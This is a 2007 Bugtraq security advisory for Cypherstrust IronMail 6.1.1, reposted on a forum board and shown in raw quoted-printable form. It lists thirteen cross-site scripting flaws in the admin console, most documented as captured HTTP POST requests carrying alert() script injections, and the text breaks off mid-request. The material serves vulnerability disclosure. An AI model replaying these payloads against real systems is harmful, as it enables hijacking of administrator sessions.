Multiple XSS in IronMail

看板Bugtraq作者deese.時間19年前 (2007/03/27 01:08)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

This is a MIME-formatted message. If you see this text it means that your E-mail software does not support MIME-formatted messages. --=_gantz-15840-1174901611-0001-2 Content-Type: text/plain; charset=iso-8859-1; format=flowed Content-Transfer-Encoding: 7bit Founded multiple XSS in IronMail. See attached advisory. Spanish version in http://www.514.es. Regards, - J --=_gantz-15840-1174901611-0001-2 Content-Type: text/plain; name="SIAADV-07-004-EN.txt"; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline; filename="SIAADV-07-004-EN.txt" =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D - Advisory - =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D =20 T=EDtulo: Multipls XSS in Cypherstrust Ironmail 6.1.1 Risk: Medium Date: 20.Feb.2007 Author: Javier Olascoaga <jolascoaga *at* 514.es> =20 WEB: http://www.514.es/ =2E: [ INTRO ] :. =09 IronMail protects enterprise email systems from inbound threats: spam, vi= ruses; or hackers trying to take down or take over the e-mail system. IronMail p= rotects enterprise email systems from outbound threats: regulatory compliance vio= lations , corporate policy violations, or theft ("leakage") of confidential infor= mation=20 or intellectual property. IronMail protects enterprise email systems from= threats that haven't even been identified yet.=20 =2E: [ TECHNICAL DESCRIPTION ] :. During the development of the technical tests against the IronMail mail s= ystem=20 have been detected several Cross Site Scripting vulnerabilities in the=20 administration console of the product. Next you can find the XSS founded: =2E: [ XSS #1 ] :. POST https://172.0.0.2:10443/admin/systemRouting.do?method=3Dsubmit HTTP/= 1.1 Referer: https://172.0.0.2:10443/admin/systemRouting.do?method=3Dinit&isMenuToggle= d=3D1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 295 Cache-Control: no-cache Cookie: CTSecureToken=3D53DFBE4753D221B2707050E96902E98D_admin; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fme= thod%3Dinit%26isMenuToggled%3D1; menusToExpand=3D%2CConfigurationMenu%2C; tabbedMenuSelected=3D11; /admin/queueManager.dofirsttimeload=3D1; /admin/queueManager.do=3D; JSESSIONID=3DB227892A258E91419C09469E49AED4D4 'rows%5B0%5D.networkId=3D172.16.0.0&rows%5B0%5D.netmaskId=3D255.255.0.0= &rows%5B1%5D.networkId=3D192.168.0.0&rows%5B1%5D.netmaskId=3D255.255.0.0&= network=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=3D= 128.0.0.0&defRouterIp=3D%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscri= pt%3E&submit=3DSubmit =2E: [ XSS #2 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT= TP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DgetDetail&isMen= uToggled=3D1 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 343 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F= method%3DgetDetail%26isMenuToggled%3D1; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E Wmtu=3D1500&hostName=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript= %3E&domainName=3Dsytes.net&ipAddress=3D10.1.1.1&ipNetMask=3D255.255.255.2= 24&defaultRouter=3D10.1.1.2&dns1=3D10.1.1.3&dns2=3D10.1.1.4&dns3=3D10.1.1= =2E5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZ= one=3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:11:46 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #3 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT= TP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe= w Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 341 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F= method%3DsaveNew; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E Umtu=3D1500&hostName=3Dmmail11&domainName=3D%27%3E%3Cscript%3Ealert%28%27= SIA%27%29%3C%2Fscript%3E&ipAddress=3D10.1.1.1&ipNetMask=3D255.255.255.224= &defaultRouter=3D10.1.1.2&dns1=3D10.1.1.3&dns2=3D10.1.1.4&dns3=3D10.1.1.5= &ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone=3D= Europe%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:26 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #4 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT= TP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe= w Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 337 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F= method%3DsaveNew; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E Qmtu=3D1500&hostName=3Dmmail11&domainName=3Dsytes.net&ipAddress=3D%27%3E%= 3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=3D255.255.255.22= 4&defaultRouter=3D10.1.1.2&dns1=3D10.1.1.3&dns2=3D10.1.1.4&dns3=3D10.1.1.= 5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone= =3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:31 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #5 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT= TP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe= w Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 337 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F= method%3DsaveNew; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E Qmtu=3D1500&hostName=3Dmmail11&domainName=3Dsytes.net&ipAddress=3D10.1.1.= 1&ipNetMask=3D255.255.255.224&defaultRouter=3D%27%3E%3Cscript%3Ealert%28%= 27SIA%27%29%3C%2Fscript%3E&dns1=3D10.1.1.3&dns2=3D10.1.1.4&dns3=3D10.1.1.= 5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone= =3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:36 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #6 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT= TP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe= w Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 338 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F= method%3DsaveNew; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E Rmtu=3D1500&hostName=3Dmmail11&domainName=3Dsytes.net&ipAddress=3D10.1.1.= 1&ipNetMask=3D255.255.255.224&defaultRouter=3D10.1.1.2&dns1=3D%27%3E%3Csc= ript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=3D10.1.1.4&dns3=3D10.1.1.= 5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone= =3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:41 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #7 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNew HT= TP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=3DsaveNe= w Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 340 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3F= method%3DsaveNew; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E Tmtu=3D1500&hostName=3Dmmail11&domainName=3Dsytes.net&ipAddress=3D10.1.1.= 1&ipNetMask=3D255.255.255.224&defaultRouter=3D10.1.1.2&dns1=3D10.1.1.3&dn= s2=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=3D10.1.1.= 5&ntp1=3Dtime.nist.gov&ntp2=3Dbitsy.mit.edu&ntp3=3Dclock.isc.org&timeZone= =3DEurope%2FMadrid&ethernetSetting=3Dautoselect&submit=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:48 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #8 ] :. POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=3DsaveNew HT= TP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemOutOfBand.do?method=3DgetDetail&isMen= uToggled=3D1 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 154 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3F= method%3DgetDetail%26isMenuToggled%3D1; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E outOfBand=3Dtrue&mtu=3D1500&ipAddress=3D%27%3E%3Cscript%3Ealert%28%27SIA%= 27%29%3C%2Fscript%3E&ethernetSetting=3Dautoselect&ipNetMask=3D255.255.255= =2E224&submit=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:13:16 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #9 ] :. POST https://172.0.0.2:10443/admin/systemBackup.do?method=3Dsubmit HTTP/1= =2E1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemBackup.do?method=3Dinit&isMenuToggled= =3D1 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 146 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmet= hod%3Dinit%26isMenuToggled%3D1; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E password=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmP= assword=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=3D= Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:13:41 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #10 ] :. POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=3Dsubmi= t HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemLicenseManager.do?method=3Dinit&isMen= uToggled=3D1 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 75 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D17; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemLicenseManager.= do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=3D%2CConfigurationMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E Klicense=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=3D= Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:20:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #11 ] :. POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=3Dsave HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=3Dinit&isMen= uToggled=3D1&procId=3D90 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 1225 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D15; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.= do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc= countMenu%2C; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E procId=3D90&rows%5B0%5D.attrName=3Dgui_log_level&rows%5B0%5D.attrType=3D1= 2&rows%5B0%5D.attrValidate=3D%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+Labe= lValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+Lab= elValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=3D30060003%= 3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=3D= &rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.modifyable=3Dtrue&rows%5B0%5D.= attrValueStrClone=3D4&rows%5B0%5D.langTagId=3D2000003&rows%5B0%5D.attrVal= ue=3D4&rows%5B1%5D.attrName=3Dgui_timeout&rows%5B1%5D.attrType=3D2&rows%5= B1%5D.attrValidate=3D%5B1-30%5D&rows%5B1%5D.attrValidateStr=3D%5B1-30%5D&= rows%5B1%5D.attrDepends=3D&rows%5B1%5D.multipleValue=3D0&rows%5B1%5D.modi= fyable=3Dtrue&rows%5B1%5D.attrValueStrClone=3D30&rows%5B1%5D.langTagId=3D= 2001014&rows%5B1%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29= %3C%2Fscript%3E&rows%5B2%5D.attrName=3Dauto_refresh&rows%5B2%5D.attrType=3D= 2&rows%5B2%5D.attrValidate=3D%5B1-30%5D&rows%5B2%5D.attrValidateStr=3D%5B= 1-30%5D&rows%5B2%5D.attrDepends=3D&rows%5B2%5D.multipleValue=3D0&rows%5B2= %5D.modifyable=3Dtrue&rows%5B2%5D.attrValueStrClone=3D4&rows%5B2%5D.langT= agId=3D2001017&rows%5B2%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SI= A2%27%29%3C%2Fscript%3E&submitValue=3DSubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:21:27 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #12 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D= init&procId=3D164 Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2840 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D11; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/ldap_ConfigureService= Properties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc= countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD= APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E procId=3D164&rows%5B0%5D.attrName=3Dsync_time&rows%5B0%5D.attrType=3D2&ro= ws%5B0%5D.attrValidate=3D%5B1-24%5D&rows%5B0%5D.attrValidateStr=3D%5B1-24= %5D&rows%5B0%5D.attrDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.= modifyable=3Dtrue&rows%5B0%5D.attrValueStrClone=3D24&rows%5B0%5D.langTagI= d=3D2016401&rows%5B0%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA%2= 7%29%3C%2Fscript%3E&rows%5B1%5D.attrName=3Dsync_results_count&rows%5B1%5D= =2EattrType=3D2&rows%5B1%5D.attrValidate=3D%5B1-500%5D&rows%5B1%5D.attrVa= lidateStr=3D%5B1-500%5D&rows%5B1%5D.attrDepends=3D&rows%5B1%5D.multipleVa= lue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.attrValueStrClone=3D50&= rows%5B1%5D.langTagId=3D2016402&rows%5B1%5D.attrValueStr=3D50&rows%5B2%5D= =2EattrName=3Dsync_rules_order&rows%5B2%5D.attrType=3D1&rows%5B2%5D.attrV= alidate=3D&rows%5B2%5D.attrValidateStr=3D&rows%5B2%5D.attrDepends=3D&rows= %5B2%5D.multipleValue=3D1&rows%5B2%5D.modifyable=3Dtrue&rows%5B2%5D.attrV= alueStrClone=3D&rows%5B2%5D.langTagId=3D2016403&rows%5B2%5D.attrValue=3D&= rows%5B3%5D.attrName=3Dldap_fail_open&rows%5B3%5D.attrType=3D5&rows%5B3%5= D.attrValidate=3D&rows%5B3%5D.attrValidateStr=3D&rows%5B3%5D.attrDepends=3D= &rows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3Dtrue&rows%5B3%5D.= attrValueStrClone=3D1&rows%5B3%5D.langTagId=3D2016404&rows%5B3%5D.attrVal= ue=3Dtrue&rows%5B4%5D.attrName=3Dldap_failure_count&rows%5B4%5D.attrType=3D= 2&rows%5B4%5D.attrValidate=3D%5B1-50%5D&rows%5B4%5D.attrValidateStr=3D%5B= 1-50%5D&rows%5B4%5D.attrDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4= %5D.modifyable=3Dtrue&rows%5B4%5D.attrValueStrClone=3D3&rows%5B4%5D.langT= agId=3D2016405&rows%5B4%5D.attrValueStr=3D3&rows%5B5%5D.attrName=3Dldap_m= onitor_intvl&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrValidate=3D%5B1-144= 0%5D&rows%5B5%5D.attrValidateStr=3D%5B1-1440%5D&rows%5B5%5D.attrDepends=3D= &rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3Dtrue&rows%5B5%5D.= attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2016406&rows%5B5%5D.attrVal= ueStr=3D5&rows%5B6%5D.attrName=3Dldap_alert_type&rows%5B6%5D.attrType=3D1= 2&rows%5B6%5D.attrValidate=3D%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+Labe= lValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+Labe= lValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelV= alueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+La= belValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=3D30060= 019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C300= 60009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=3D&rows%5= B6%5D.multipleValue=3D0&rows%5B6%5D.modifyable=3Dtrue&rows%5B6%5D.attrVal= ueStrClone=3D3&rows%5B6%5D.langTagId=3D2016407&rows%5B6%5D.attrValue=3D3&= rows%5B7%5D.attrName=3Dldap_route_aft_masq&rows%5B7%5D.attrType=3D5&rows%= 5B7%5D.attrValidate=3D&rows%5B7%5D.attrValidateStr=3D&rows%5B7%5D.attrDep= ends=3D&rows%5B7%5D.multipleValue=3D0&rows%5B7%5D.modifyable=3Dtrue&rows%= 5B7%5D.attrValueStrClone=3D0&rows%5B7%5D.langTagId=3D2016408&submitValue=3D= Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:22:51 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=3Dutf-8 =2E: [ XSS #13 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D= save Accept-Language: es-ES,en-us;q=3D0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2840 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=3D11; itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/ldap_ConfigureService= Properties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc= countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD= APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D; JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E procId=3D164&rows%5B0%5D.attrName=3Dsync_time&rows%5B0%5D.attrType=3D2&ro= ws%5B0%5D.attrValidate=3D%5B1-24%5D&rows%5B0%5D.attrValidateStr=3D%5B1-24= %5D&rows%5B0%5D.attrDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.= modifyable=3Dtrue&rows%5B0%5D.attrValueStrClone=3D24&rows%5B0%5D.langTagI= d=3D2016401&rows%5B0%5D.attrValueStr=3D24&rows%5B1%5D.attrName=3Dsync_res= ults_count&rows%5B1%5D.attrType=3D2&rows%5B1%5D.attrValidate=3D%5B1-500%5= 